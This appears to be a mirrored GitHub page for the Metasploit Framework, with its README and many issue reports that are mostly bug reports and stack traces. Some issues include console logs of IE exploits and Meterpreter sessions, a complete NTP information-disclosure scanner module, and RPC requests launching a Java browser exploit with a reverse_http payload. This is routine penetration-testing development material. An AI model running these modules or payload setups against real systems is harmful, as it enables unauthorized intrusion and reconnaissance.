rapid7 / metasploit-framework Goto Github PK

Metasploit Framework

License: Other

Ruby 94.41% Shell 0.02% C 1.31% HTML 0.20% JavaScript 0.13% PowerShell 3.08% Python 0.55% PHP 0.01% Assembly 0.08% DIGITAL Command Language 0.01% Batchfile 0.01% Objective-C 0.01% Makefile 0.03% CSS 0.01% PostScript 0.01% C++ 0.01% Dockerfile 0.02% Go 0.04% Rich Text Format 0.08% VBScript 0.01%

hacktoberfest

metasploit-framework's Introduction

Metasploit

The Metasploit Framework is released under a BSD-style license. See COPYING for more details.

The latest version of this software is available from: https://docs.metasploit.com/docs/using-metasploit/getting-started/nightly-installers.html

You can find documentation on Metasploit and how to use it at: https://docs.metasploit.com/

Information about setting up a development environment can be found at: https://docs.metasploit.com/docs/development/get-started/setting-up-a-metasploit-development-environment.html

Our bug and feature request tracker can be found at: https://github.com/rapid7/metasploit-framework/issues

New bugs and feature requests should be directed to: https://r-7.co/MSF-BUGv1

API documentation for writing modules can be found at: https://docs.metasploit.com/api/

Questions and suggestions can be sent to: Freenode IRC channel or e-mail the metasploit-hackers mailing list

Installing

Generally, you should use the free installer, which contains all of the dependencies and will get you up and running with a few clicks. See the Dev Environment Setup if you'd like to deal with dependencies on your own.

Using Metasploit

Metasploit can do all sorts of things. The first thing you'll want to do is start msfconsole, but after that, you'll probably be best served by reading the basics of using Metasploit or Metasploit Unleashed.

Contributing

See the Dev Environment Setup guide on GitHub, which will walk you through the whole process from installing all the dependencies, to cloning the repository, and finally to submitting a pull request. For slightly more information, see Contributing.

metasploit-framework's People

Contributors

Stargazers

Watchers

Forkers

patrickdwells simplyappy betoatx ceballosm-zz techpeace tecknicaltom scriptjunkie xerohawk icewall exarkun634 kernelsmith djmanilaice naoix bannedit anagogue imaburr snare ewee-parker dncc noobzero la5antha mbevand-r7 strcrzy fel1x timwr mharshal danonno gigia akasame traccer cybersnake2 budi-khoirudin digitaltrickster soh-cah-toa m-1-k-3 cbgabriel-zz sempervictus hardbox famousforayear mayaseven davehull mak andriynoble cd1zz claudijd matugm jhartftw lincoln-corelan ygoltsev arollyson sohilgarg mephos vijayvkvelu wireghoul mandreko brokenbox drewch niklasb bl4ckbyt3 thesp0nge wvandevanter-r7 pentesting minlex vs4vijay ultsfr67 samjoan wchen-r7 chrisjohnriley fyoorer alexmaloteaux schierlm jlee-r7 deadbyte danielmosquera hellok yeying chap0 aczid yudanta xabyte2011 vincentvicious sbakke sdanelson anaoy r3tr0 b0telh0 dpixel datacut alech forced-request trolldbois kanekiyo lex0tanil buffalowill todb intfrr firefart doanosaur r7thao gh0zt666

metasploit-framework's Issues

ie_execcommand_uaf - undefined method `[]' for nil:NilClass

Exception when calling the actual IE 0day exploit. SVN-Revision: 15858

msf  exploit(ie_execcommand_uaf) > [*] Using URL: http://XXXXXXXX:8080/sQv2rZCBBA
[*] Server started.
[*] XXXXXXXX     ie_execcommand_uaf - Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3; .NET CLR 1.1.4322; Tablet PC 2.0)
[*] XXXXXXXX     ie_execcommand_uaf - Redirecting to wFMCx.html
[*] XXXXXXXX     ie_execcommand_uaf - Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3; .NET CLR 1.1.4322; Tablet PC 2.0)
[*] XXXXXXXX     ie_execcommand_uaf - Loading wFMCx.html
[-] XXXXXXXX     ie_execcommand_uaf - Exception handling request: undefined method `[]' for nil:NilClass

neXpose plugin patch to save/load credentials

Hi. I just commited a patch to my fork that extends the neXpose plugin so it can save/load credentials from file just like how the Nessus plugin can do. The commit is at https://github.com/mboman/metasploit-framework/commit/e7874e9cb12245c6c96be7bcb9de703be5f8c426, however I am no git guru so I dunno how to make a pull-request of this...

RuntimeError can't add a new key into hash during iteration

When selecting a payload the framework will occasionally throw an error about inserting a new key into a hash during iteration. To reproduce, edit a module within the framework a few times, and pry the edited module for good measure.

This error makes running any exploits impossible without a framework restart as payloads cannot be set or tab completed

Example output when trying to tab complete a payload in a module:
set PAYLOAD wi[-] RbReadline Error: RuntimeError can't add a new key into hash during iteration

/opt/metasploit4/msf4/lib/msf/core/payload_set.rb:308:in []=' /opt/metasploit4/msf4/lib/msf/core/payload_set.rb:308:inadd_single'
/opt/metasploit4/msf4/lib/msf/core/payload_set.rb:105:in block in recalculate' /opt/metasploit4/msf4/lib/msf/core/payload_set.rb:94:ineach_pair'
/opt/metasploit4/msf4/lib/msf/core/payload_set.rb:94:in recalculate' /opt/metasploit4/msf4/lib/msf/core/module_manager.rb:84:increate'
/opt/metasploit4/msf4/lib/msf/core/module_manager.rb:195:in block in demand_load_modules' /opt/metasploit4/msf4/lib/msf/core/module_manager.rb:191:ineach_pair'
/opt/metasploit4/msf4/lib/msf/core/module_manager.rb:191:in demand_load_modules' /opt/metasploit4/msf4/lib/msf/core/module_manager.rb:128:ineach_module'
/opt/metasploit4/msf4/lib/msf/core/exploit.rb:805:in compatible_payloads' /opt/metasploit4/msf4/lib/msf/ui/console/command_dispatcher/core.rb:2513:inoption_values_payloads'
/opt/metasploit4/msf4/lib/msf/ui/console/command_dispatcher/core.rb:2404:in tab_complete_option' /opt/metasploit4/msf4/lib/msf/ui/console/command_dispatcher/core.rb:1858:incmd_set_tabs'
/opt/metasploit4/msf4/lib/rex/ui/text/dispatcher_shell.rb:350:in tab_complete_helper' /opt/metasploit4/msf4/lib/rex/ui/text/dispatcher_shell.rb:310:inblock in tab_complete_stub'
/opt/metasploit4/msf4/lib/rex/ui/text/dispatcher_shell.rb:299:in each' /opt/metasploit4/msf4/lib/rex/ui/text/dispatcher_shell.rb:299:intab_complete_stub'
/opt/metasploit4/msf4/lib/rex/ui/text/dispatcher_shell.rb:284:in tab_complete' /opt/metasploit4/msf4/lib/rex/ui/text/shell.rb:59:inblock in init_tab_complete'
/opt/metasploit4/msf4/lib/readline_compatible.rb:157:in call' /opt/metasploit4/msf4/lib/readline_compatible.rb:157:inreadline_attempted_completion_function'
/opt/metasploit4/msf4/lib/rbreadline.rb:6262:in gen_completion_matches' /opt/metasploit4/msf4/lib/rbreadline.rb:6747:inrl_complete_internal'
/opt/metasploit4/msf4/lib/rbreadline.rb:6837:in rl_complete' /opt/metasploit4/msf4/lib/rbreadline.rb:4307:in_rl_dispatch_subseq'
/opt/metasploit4/msf4/lib/rbreadline.rb:4296:in _rl_dispatch' /opt/metasploit4/msf4/lib/rbreadline.rb:4716:inreadline_internal_charloop'
/opt/metasploit4/msf4/lib/rbreadline.rb:4790:in readline_internal' /opt/metasploit4/msf4/lib/rbreadline.rb:4812:inreadline'
/opt/metasploit4/msf4/lib/readline_compatible.rb:77:in readline' /opt/metasploit4/msf4/lib/rex/ui/text/input/readline.rb:90:inpgets'
/opt/metasploit4/msf4/lib/rex/ui/text/shell.rb:184:in run' /opt/metasploit4/msf4/msfconsole:143:in

Typo in Msf::Util::EXE

I'm not quite sure but it seems that there is a typo in https://github.com/rapid7/metasploit-framework/blob/master/lib/msf/util/exe.rb#L59 - the "fellback" should be "fallback", shouldn't it?

pull #830 - bug with mysql

Hi,

i'm the author of the module.
as you have amended the enumeration_mysql function before merging into master, the function is now broken.

please revert to the pre #830. ( original commit was #802 ).

Request: Post Module - enum_computers via LDAP/AD

The current enum_computers post module currently uses 'net view' in a shell to recover computers which is pretty unreliable; it often wont return any results; and inconsitant; it doesn't return all domain computers.

As a windows domain member you can enumerate domain computers (and shared folders/printers/users/groups etc) with LDAP lookups in AD.

This is really handy for identifying specific server types etc:
c:\windows\system32\rundll32.exe dsquery.dll,OpenQueryWindow

I was wondering if it could be done via WinAPIs or some funky Powershell? Will try and implement this myself if I have some time!

Incorrect version matching for auxiliary/scanner/upnp/ssdp_msearch.rb's CVE-2013-0229 and CVE-2013-0230

I'm git-less and have gone git-tarded right now so I don't have a patch for this, but I noticed that auxiliary/scanner/upnp/ssdp_msearch.rb has what I believe to be incorrect version matches for CVE-2013-0229 and CVE-2013-0229. I believe them to be reversed in the metasploit module. For example, according to http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-0230, MiniUPnPd version 1.0 is vulnerable to this, however the module will match on 1.0 - 1.3

IPv6 bind_tcp fails croaks after 2nd connection

Using a bind_ipv6_tcp binary:

[*] Started bind handler
[-] Exploit failed: Setting ExitOnSession to false requires running as a job (exploit -j)
[*] Transmitting intermediate stager for over-sized stage...(216 bytes)
[*] Sending stage (752128 bytes) to 2001:0:4aIPV6
[*] Meterpreter session 2 opened (2001:0:536IPV6 -> 2001:0:4aIPv6:8080) at 2012-09-20 20:38:42 +0000

meterpreter > run migrate -f
[*] Current server process: ipv6_8080.exe (2304)
[*] Spawning notepad.exe process to migrate to
[+] Migrating to 2128
[+] Successfully migrated to process 
meterpreter > background
[*] Backgrounding session 2...
2012-09-20 20:38:57 +0000 1 0 exploit(handler) > exploit

[-] Exploit failed: Setting ExitOnSession to false requires running as a job (exploit -j)
[*] Started bind handler
[*] Transmitting intermediate stager for over-sized stage...(216 bytes)
[*] Sending stage (752128 bytes) to 2001:IPV6ADDRESS

^C2012-09-20 20:40:23 +0000 1 0 exploit(handler) > exploit

[*] Started bind handler

And the host is definitely still listening:

C:\Users\jdoe>netstat -ano | findstr 8080
  TCP    [::]:8080              [::]:0                 LISTENING       2304

ie_cdwnbindinfo_uaf - can't convert nil into String

[*] XXXXX  ie_cdwnbindinfo_uaf - Requesting: /test
[-] XXXXX  ie_cdwnbindinfo_uaf - Exception handling request: can't convert nil into String

Getting this error when requesting a SSL Page from a Win2003 PC. Is there a parameter to enable Stacktraces?

add Security Type support and Enhanced Error Handling

Scanner Module: vnc_none_auth

The scanner does not seem to support all security types and when this error occurs the scanner raises RuntimeError.new("Auth negotiation failed: #{vnc.error}") on line 61.

This error causes a failure to complete a scan for a network, please update the scanner module to support these security types or improve error handling.

Security Types Unsupported:

    MAC_OSX_SECTYPE_30 = 30
    MAC_OSX_SECTYPE_35 = 35

If anymore information is necessary please feel free to contact me.

Thanks

'route add' fails on java meterpreter

running on ARM host, used a simple command to route a single host:

meterpreter > route add 192.168.10.1 255.255.255.0 1
Creating route 192.168.10.1/255.255.255.0 -> 1
[-] stdapi_net_config_add_route: Operation failed: 1

Getting this in the logs:

[07/19/2012 10:51:48] [e(0)] meterpreter: stdapi_net_config_add_route: Operation failed: 1
[07/19/2012 10:51:48] [d(0)] meterpreter: Call stack:
metasploit-framework/lib/rex/post/meterpreter/extensions/stdapi/net/config.rb:152:in `add_route'
metasploit-framework/lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/net.rb:212:in `cmd_route'
metasploit-framework/lib/rex/ui/text/dispatcher_shell.rb:420:in `run_command'
metasploit-framework/lib/rex/post/meterpreter/ui/console.rb:104:in `run_command'
metasploit-framework/lib/rex/ui/text/dispatcher_shell.rb:382:in `block in run_single'
metasploit-framework/lib/rex/ui/text/dispatcher_shell.rb:376:in `each'
metasploit-framework/lib/rex/ui/text/dispatcher_shell.rb:376:in `run_single'
metasploit-framework/lib/rex/post/meterpreter/ui/console.rb:68:in `block in interact'
metasploit-framework/lib/rex/ui/text/shell.rb:190:in `call'
metasploit-framework/lib/rex/ui/text/shell.rb:190:in `run'
metasploit-framework/lib/rex/post/meterpreter/ui/console.rb:66:in `interact'
metasploit-framework/lib/msf/base/sessions/meterpreter.rb:431:in `_interact'
metasploit-framework/lib/rex/ui/interactive.rb:49:in `interact'
metasploit-framework/lib/msf/ui/console/command_dispatcher/core.rb:1595:in `cmd_sessions'
metasploit-framework/lib/rex/ui/text/dispatcher_shell.rb:420:in `run_command'
metasploit-framework/lib/rex/ui/text/dispatcher_shell.rb:382:in `block in run_single'
metasploit-framework/lib/rex/ui/text/dispatcher_shell.rb:376:in `each'
metasploit-framework/lib/rex/ui/text/dispatcher_shell.rb:376:in `run_single'
metasploit-framework/lib/rex/ui/text/shell.rb:200:in `run'
./msfconsole:143:in `<main>'

Aux modules cannot run over routed session due to missing "on_client_connect_proc"

Ruby 1.8.7
Latest revision as of today Jun/28/2012
Pastie of walk through: http://pastie.org/private/djn9rugyjizmiymy6ioczg

Getting:

[-] Auxiliary failed: NoMethodError undefined method on_client_connect_proc=' for #<Rex::Post::Meterpreter::Extensions::Stdapi::Net::SocketSubsystem::TcpServerChannel:0x114835440> [-] Call stack: [-] /Users/mubix/Documents/code/metasploit-framework/lib/rex/proto/http/server.rb:144:instart'
[-] /Users/mubix/Documents/code/metasploit-framework/lib/rex/service_manager.rb:80:in start' [-] /Users/mubix/Documents/code/metasploit-framework/lib/rex/service_manager.rb:24:instart'
[-] /Users/mubix/Documents/code/metasploit-framework/lib/msf/core/exploit/http/server.rb:155:in start_service' [-] /Users/mubix/Documents/code/metasploit-framework/lib/msf/core/exploit/tcp.rb:314:inexploit'
[-] /Users/mubix/Documents/code/metasploit-framework/modules/auxiliary/server/capture/http_ntlm.rb:97:in `run'

SSH Shells Broken on Cisco ASA 8.4(5)

During testing for a cisco SSH vulnerability i'm finding that newer ASA's do not like our standard SSH shell. The login scanner authenticates, then nothing - blank screen, no input or output. I'm seeing this on 8.4 current - 8.4(5), may be present in others.

Interestingly enough, MetaSSH does not suffer from this problem. I'm able to establish a metassh session, then run a shell and work in the shell channel without issue. Post modules however, do not work properly since the plugin is not in trunk and the session type is not handled correctly by framework.

Cisco's SSH implementation is a bit different from normal *nix systems, and i'm presently helping to resolve another vendor's issue regarding the matter. We may need to do a banner check on all our SSH scanners to accommodate for additional delay between transport and session auth.

Windows meterpreter crashes running multiple post modules

Meterpreter doesnt seem to like running concurrent post modules. Results in dead sessions. Happens in internal build of meterpreter as well as r7-trunk build.

I've seen this on several occasions before, but now that i'm starting to ramp up meterpreter's post activities this seems a much larger problem.

Try running http://pastebin.com/uqaWNAcr to enumerate user data in a meterpreter session to see the results. The script tries to throttle concurrent activity by performing a check against live threads in the sessions' thread pool and the max_threads var passed into the method. Even at 5 modules, it dies a miserable death.

db_import of Burp session fails

Steps:

Save burp state (example.burp)
Unzip the burp state (unzip example.burp)
Rename the extracted file "burp" to "burp.xml"
run db_import /path/to/burp.xml (path has no spaces btw)
Following ruby stack trace is displayed:

2011-12-16 12:23:37 +0100 S:0 J:1 > db_import /root/burp.xml
[-] Error while running command db_import: getaddrinfo: Name or service not known

Call stack:
/opt/framework/msf3/lib/rex/socket.rb:176:in gethostbyname' /opt/framework/msf3/lib/rex/socket.rb:176:ingetaddress'
/opt/framework/msf3/lib/rex/socket.rb:124:in is_ipv4?' /opt/framework/msf3/lib/msf/core/db.rb:163:inipv4_validator'
/opt/framework/msf3/lib/msf/core/db.rb:158:in ipv46_validator' /opt/framework/msf3/lib/msf/core/db.rb:2226:inimport_filetype_detect'
/opt/framework/msf3/lib/msf/core/db.rb:2086:in import' /opt/framework/msf3/lib/msf/core/db.rb:2072:inimport_file'
/opt/framework/msf3/lib/msf/ui/console/command_dispatcher/db.rb:1018:in block (2 levels) in cmd_db_import' /opt/framework/msf3/lib/msf/ui/console/command_dispatcher/db.rb:1011:ineach'
/opt/framework/msf3/lib/msf/ui/console/command_dispatcher/db.rb:1011:in block in cmd_db_import' /opt/framework/msf3/lib/msf/ui/console/command_dispatcher/db.rb:1005:ineach'
/opt/framework/msf3/lib/msf/ui/console/command_dispatcher/db.rb:1005:in cmd_db_import' /opt/framework/msf3/lib/rex/ui/text/dispatcher_shell.rb:380:inrun_command'
/opt/framework/msf3/lib/rex/ui/text/dispatcher_shell.rb:342:in block in run_single' /opt/framework/msf3/lib/rex/ui/text/dispatcher_shell.rb:336:ineach'
/opt/framework/msf3/lib/rex/ui/text/dispatcher_shell.rb:336:in run_single' /opt/framework/msf3/lib/rex/ui/text/shell.rb:199:inrun'
/opt/framework/msf3/lib/msf/ui/web/console.rb:65:in block in initialize' /opt/framework/msf3/lib/msf/core/thread_manager.rb:64:incall'
/opt/framework/msf3/lib/msf/core/thread_manager.rb:64:in `block in spawn'

2011-12-16 12:23:37 +0100 S:0 J:1 > version
Framework: 4.2.0-dev.14161
Console : 4.2.0-dev.14065

On Backtrack 5 R1 (64-bit)

Module: NTP Clock Variables Disclosure

This file is part of the Metasploit Framework and may be subject to

redistribution and commercial restrictions. Please see the Metasploit

web site for more information on licensing and terms of use.

http://metasploit.com/

require 'msf/core'

class Metasploit3 < Msf::Auxiliary

include Msf::Exploit::Remote::Udp
include Msf::Auxiliary::Report
include Msf::Auxiliary::Scanner


def initialize(info = {})
    super(update_info(info,
        'Name'           => 'NTP Clock Variables Disclosure',
        'Description'    => %q{
            This module reads the system internal NTP variables. These variables contain potentially 
            sensitive information, such as the NTP software version, operating system version, peers, and more..
        },
        'Author'         => 'Ewerson Guimaraes(Crash) <crash[at]dclabs.com.br>',
        'License'        => MSF_LICENSE,
        'Version'        => '',
        'References'     =>
            [
                    ['URL','http://www.rapid7.com/vulndb/lookup/ntp-clock-variables-disclosure' ],
        ]
        )
    )
    register_options(
    [
        Opt::RPORT(123)
    ], self.class)
end

def run_host(ip)

    connect_udp

    readvar = "\x16\x02\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00" #readvar command
    print_status("Connecting target #{rhost}:#{rport}...")

    print_status("Sending command...")
    udp_sock.put(readvar)
    reply = udp_sock.recvfrom(65535, 0.1)
    p_reply =( reply[0].split(","))
    arr_count = 0
            while ( arr_count < p_reply.size)
                    if arr_count == 0
                        print_good (p_reply[arr_count].slice(12,p_reply[arr_count].size)) #12 is the adjustment of packet garbage
                        arr_count =  arr_count + 1
                    else
                        print_good (p_reply[arr_count].strip)
                        arr_count =  arr_count + 1
                    end
            end 

    disconnect_udp

end

end

Metasploit is too spicy

It requires me to drink vast amounts of alcohol and caffeinated beverages to quench.

Browser detection issue

Hi,

I noticed some interesting behavior when testing some IE exploits on a variety of hosts (XP with IE8, WIn7 with IE8, Win7 with IE9).

Clients are configured to use a proxy, capable of doing SSL inspection (mitm).

When SSL is enabled for the exploit, the proxy will intercept and sends a slightly diffferent user agent to the msfconsole webserver... different enough to make msf bail out and tell it's not a supported platform.

What I have discovered is that the browser version is wrong, but the windows version is correct:

Actual version What metasploit sees
XP SP3 with IE7 MSIE7 / NT 5.1
XP SP3 with IE8 MSIE7 / NT 5.1
Win7 with IE8 MSIE7 / NT 6.1
Win7 with IE9 MSIE7 / NT 6.1

If the IE8 target (which usually is based on a msvcrt.dll ROP chain) works on IE7 too, then the exploit can be successful in an increased number of cases, if the IE8 payload is used for MSIE7 / NT 5.1 at all times

For the non-existing combination of MSIE7 / NT 6.1, it would be good enough to send the IE9 payload. It's somewhat slower, but at least it will give a shell and not a crash.

For non SSL sessions, the UA is correct.

Drupal Views User Enum Module only writes to the database

the Drupal Views User Enum Module
http://dev.metasploit.com/redmine/projects/framework/repository/entry/modules/auxiliary/scanner/http/drupal_views_user_enum.rb

only writes to the database. if you dont have a database connected you get no data

module should write to loot, or print to screen as well

[] Begin enumerating users at 1.2.3.4
[] Done. 243 usernames found...
[*] Scanned 1 of 1 hosts (100% complete)

Exploit fails to run if PAYLOAD key is last in msgpack'd message

If msgpack places the PAYLOAD key/value pair at the end of the serialized message, Metasploit fails to run the exploit with error message: "[e(0)] core: Exploit failed (multi/browser/java_jre17_jmxbean): A payload has not been selected.". Otherwise, it will run successfully if PAYLOAD is in the middle somewhere. I've attached to request/response pairs. One with PAYLOAD in the middle of the message, the other with PAYLOAD at the end. Decoding the messages manually verifies that msgpack is correctly serializing the message. However, Metasploit somehow is not liking it. Notice how the order of the PAYLOAD option affects the outcome:

This request works:

POST /api/ HTTP/1.1
Host: 127.0.0.1:55553
Accept-Encoding: identity
Content-Length: 187
Content-Type: binary/message-pack

..module.execute.. TEMPMKtYw7nAZyaW3Z0B5KVmQ1tIWJ0y.exploit.. multi/browser/java_jre17_jmxbean..LPORT....PAYLOAD.java/meterpreter/reverse_http.SRVHOST.0.0.0.0.SRVPORT....LHOST.192.168.1.2HTTP/1.1 200 OK
Content-Type: binary/message-pack
Connection: close
Server: Rex
Content-Length: 23

..job_id..uuid.axujjppw

Hex representation:

00000000  50 4f 53 54 20 2f 61 70  69 2f 20 48 54 54 50 2f POST /ap i/ HTTP/
00000010  31 2e 31 0d 0a 48 6f 73  74 3a 20 31 32 37 2e 30 1.1..Hos t: 127.0
00000020  2e 30 2e 31 3a 35 35 35  35 33 0d 0a 41 63 63 65 .0.1:555 53..Acce
00000030  70 74 2d 45 6e 63 6f 64  69 6e 67 3a 20 69 64 65 pt-Encod ing: ide
00000040  6e 74 69 74 79 0d 0a 43  6f 6e 74 65 6e 74 2d 4c ntity..C ontent-L
00000050  65 6e 67 74 68 3a 20 31  38 37 0d 0a 43 6f 6e 74 ength: 1 87..Cont
00000060  65 6e 74 2d 54 79 70 65  3a 20 62 69 6e 61 72 79 ent-Type : binary
00000070  2f 6d 65 73 73 61 67 65  2d 70 61 63 6b 0d 0a 0d /message -pack...
00000080  0a 95 ae 6d 6f 64 75 6c  65 2e 65 78 65 63 75 74 ...modul e.execut
00000090  65 da 00 20 54 45 4d 50  4d 4b 74 59 77 37 6e 41 e.. TEMP MKtYw7nA
000000A0  5a 79 61 57 33 5a 30 42  35 4b 56 6d 51 31 74 49 ZyaW3Z0B 5KVmQ1tI
000000B0  57 4a 30 79 a7 65 78 70  6c 6f 69 74 da 00 20 6d WJ0y.exp loit.. m
000000C0  75 6c 74 69 2f 62 72 6f  77 73 65 72 2f 6a 61 76 ulti/bro wser/jav
000000D0  61 5f 6a 72 65 31 37 5f  6a 6d 78 62 65 61 6e 85 a_jre17_ jmxbean.
000000E0  a5 4c 50 4f 52 54 cd 1f  90 a7 50 41 59 4c 4f 41 .LPORT.. ..PAYLOA
000000F0  44 bd 6a 61 76 61 2f 6d  65 74 65 72 70 72 65 74 D.java/m eterpret
00000100  65 72 2f 72 65 76 65 72  73 65 5f 68 74 74 70 a7 er/rever se_http.
00000110  53 52 56 48 4f 53 54 a7  30 2e 30 2e 30 2e 30 a7 SRVHOST. 0.0.0.0.
00000120  53 52 56 50 4f 52 54 cd  1f 90 a5 4c 48 4f 53 54 SRVPORT. ...LHOST
00000130  ab 31 39 32 2e 31 36 38  2e 31 2e 32             .192.168 .1.2
    00000000  48 54 54 50 2f 31 2e 31  20 32 30 30 20 4f 4b 0d HTTP/1.1  200 OK.
    00000010  0a 43 6f 6e 74 65 6e 74  2d 54 79 70 65 3a 20 62 .Content -Type: b
    00000020  69 6e 61 72 79 2f 6d 65  73 73 61 67 65 2d 70 61 inary/me ssage-pa
    00000030  63 6b 0d 0a 43 6f 6e 6e  65 63 74 69 6f 6e 3a 20 ck..Conn ection: 
    00000040  63 6c 6f 73 65 0d 0a 53  65 72 76 65 72 3a 20 52 close..S erver: R
    00000050  65 78 0d 0a 43 6f 6e 74  65 6e 74 2d 4c 65 6e 67 ex..Cont ent-Leng
    00000060  74 68 3a 20 32 33 0d 0a  0d 0a 82 a6 6a 6f 62 5f th: 23.. ....job_
    00000070  69 64 00 a4 75 75 69 64  a8 61 78 75 6a 6a 70 70 id..uuid .axujjpp
    00000080  77                                               w

This request doesn't:

POST /api/ HTTP/1.1
Host: 127.0.0.1:55553
Accept-Encoding: identity
Content-Length: 187
Content-Type: binary/message-pack

..module.execute.. TEMPMKtYw7nAZyaW3Z0B5KVmQ1tIWJ0y.exploit.. multi/browser/java_jre17_jmxbean..LPORT....SRVHOST.0.0.0.0.LHOST.192.168.1.2.SRVPORT....PAYLOAD.java/meterpreter/reverse_httpHTTP/1.1 200 OK
Content-Type: binary/message-pack
Connection: close
Server: Rex
Content-Length: 23

..job_id..uuid.uuvwli5v

Hex representation:

00000000  50 4f 53 54 20 2f 61 70  69 2f 20 48 54 54 50 2f POST /ap i/ HTTP/
00000010  31 2e 31 0d 0a 48 6f 73  74 3a 20 31 32 37 2e 30 1.1..Hos t: 127.0
00000020  2e 30 2e 31 3a 35 35 35  35 33 0d 0a 41 63 63 65 .0.1:555 53..Acce
00000030  70 74 2d 45 6e 63 6f 64  69 6e 67 3a 20 69 64 65 pt-Encod ing: ide
00000040  6e 74 69 74 79 0d 0a 43  6f 6e 74 65 6e 74 2d 4c ntity..C ontent-L
00000050  65 6e 67 74 68 3a 20 31  38 37 0d 0a 43 6f 6e 74 ength: 1 87..Cont
00000060  65 6e 74 2d 54 79 70 65  3a 20 62 69 6e 61 72 79 ent-Type : binary
00000070  2f 6d 65 73 73 61 67 65  2d 70 61 63 6b 0d 0a 0d /message -pack...
00000080  0a 95 ae 6d 6f 64 75 6c  65 2e 65 78 65 63 75 74 ...modul e.execut
00000090  65 da 00 20 54 45 4d 50  4d 4b 74 59 77 37 6e 41 e.. TEMP MKtYw7nA
000000A0  5a 79 61 57 33 5a 30 42  35 4b 56 6d 51 31 74 49 ZyaW3Z0B 5KVmQ1tI
000000B0  57 4a 30 79 a7 65 78 70  6c 6f 69 74 da 00 20 6d WJ0y.exp loit.. m
000000C0  75 6c 74 69 2f 62 72 6f  77 73 65 72 2f 6a 61 76 ulti/bro wser/jav
000000D0  61 5f 6a 72 65 31 37 5f  6a 6d 78 62 65 61 6e 85 a_jre17_ jmxbean.
000000E0  a5 4c 50 4f 52 54 cd 1f  90 a7 53 52 56 48 4f 53 .LPORT.. ..SRVHOS
000000F0  54 a7 30 2e 30 2e 30 2e  30 a5 4c 48 4f 53 54 ab T.0.0.0. 0.LHOST.
00000100  31 39 32 2e 31 36 38 2e  31 2e 32 a7 53 52 56 50 192.168. 1.2.SRVP
00000110  4f 52 54 cd 1f 90 a7 50  41 59 4c 4f 41 44 bd 6a ORT....P AYLOAD.j
00000120  61 76 61 2f 6d 65 74 65  72 70 72 65 74 65 72 2f ava/mete rpreter/
00000130  72 65 76 65 72 73 65 5f  68 74 74 70             reverse_ http
    00000000  48 54 54 50 2f 31 2e 31  20 32 30 30 20 4f 4b 0d HTTP/1.1  200 OK.
    00000010  0a 43 6f 6e 74 65 6e 74  2d 54 79 70 65 3a 20 62 .Content -Type: b
    00000020  69 6e 61 72 79 2f 6d 65  73 73 61 67 65 2d 70 61 inary/me ssage-pa
    00000030  63 6b 0d 0a 43 6f 6e 6e  65 63 74 69 6f 6e 3a 20 ck..Conn ection: 
    00000040  63 6c 6f 73 65 0d 0a 53  65 72 76 65 72 3a 20 52 close..S erver: R
    00000050  65 78 0d 0a 43 6f 6e 74  65 6e 74 2d 4c 65 6e 67 ex..Cont ent-Leng
    00000060  74 68 3a 20 32 33 0d 0a  0d 0a 82 a6 6a 6f 62 5f th: 23.. ....job_
    00000070  69 64 c0 a4 75 75 69 64  a8 75 75 76 77 6c 69 35 id..uuid .uuvwli5
    00000080  76                                               v

Drilling down in the framework, execution fails at line 83 of ./lib/msf/base/simple/exploit.rb file in the exploit_simple method:

driver.payload              = exploit.framework.payloads.create(opts['Payload'])

I've verified that opts['Payload'] is not nil. I didn't know how to trace further in the framework (not a ruby expert).

Cheers,

Nadeem

Rex socks server doesn't do remote name resolution

https://github.com/rapid7/metasploit-framework/blob/master/lib/rex/proto/proxy/socks4a.rb#L131

      #
      # Resolve the given hostname into a dotted IP address.
      #
      def resolve( hostname )
        if( not hostname.empty? )
          begin
            return Rex::Socket.addr_itoa( Rex::Socket.gethostbyname( hostname )[3].unpack( 'N' ).first )
          rescue ::SocketError
            return nil
          end
        end
        return nil
      end

Update dev env wiki page to include Postgres setup

See #377

Bajillion warnings with "ruby -c -w"

modules/exploits/windows/antivirus/ams_hndlrsvc.rb:61: warning: assigned but unused variable - exe_fname
modules/exploits/windows/antivirus/ams_hndlrsvc.rb:171: warning: mismatched indentations at 'end' with 'case' at 166
modules/exploits/windows/antivirus/ams_xfr.rb:62: warning: assigned but unused variable - exe_fname
modules/exploits/windows/antivirus/ams_xfr.rb:112: warning: mismatched indentations at 'end' with 'case' at 107
modules/exploits/windows/backupexec/remote_agent.rb:97: warning: assigned but unused variable - resp
modules/exploits/windows/brightstor/mediasrv_sunrpc.rb:279: warning: assigned but unused variable - ret
modules/exploits/windows/browser/adobe_cooltype_sing.rb:320: warning: assigned but unused variable - var_start
modules/exploits/windows/browser/adobe_flash_otf_font.rb:318: warning: shadowing outer local variable - cli
modules/exploits/windows/browser/adobe_flashplayer_newfunction.rb:215: warning: assigned but unused variable - var_start
modules/exploits/windows/browser/adobe_flash_rtmp.rb:283: warning: assigned but unused variable - c0
modules/exploits/windows/browser/adobe_flash_rtmp.rb:293: warning: assigned but unused variable - c2
modules/exploits/windows/browser/adobe_flash_sps.rb:149: warning: assigned but unused variable - myhost
modules/exploits/windows/browser/adobe_flatedecode_predictor02.rb:92: warning: assigned but unused variable - p
modules/exploits/windows/browser/adobe_geticon.rb:82: warning: assigned but unused variable - p
modules/exploits/windows/browser/adobe_jbig2decode.rb:73: warning: assigned but unused variable - p
modules/exploits/windows/browser/adobe_shockwave_rcsl_corruption.rb:78: warning: assigned but unused variable - p
modules/exploits/windows/browser/adobe_utilprintf.rb:64: warning: assigned but unused variable - p
modules/exploits/windows/browser/amaya_bdo.rb:60: warning: assigned but unused variable - p
modules/exploits/windows/browser/aol_ampx_convertfile.rb:70: warning: assigned but unused variable - p
modules/exploits/windows/browser/apple_itunes_playlist.rb:63: warning: assigned but unused variable - p
modules/exploits/windows/browser/apple_quicktime_marshaled_punk.rb:101: warning: assigned but unused variable - shellcode
modules/exploits/windows/browser/apple_quicktime_smil_debug.rb:123: warning: assigned but unused variable - shellcode
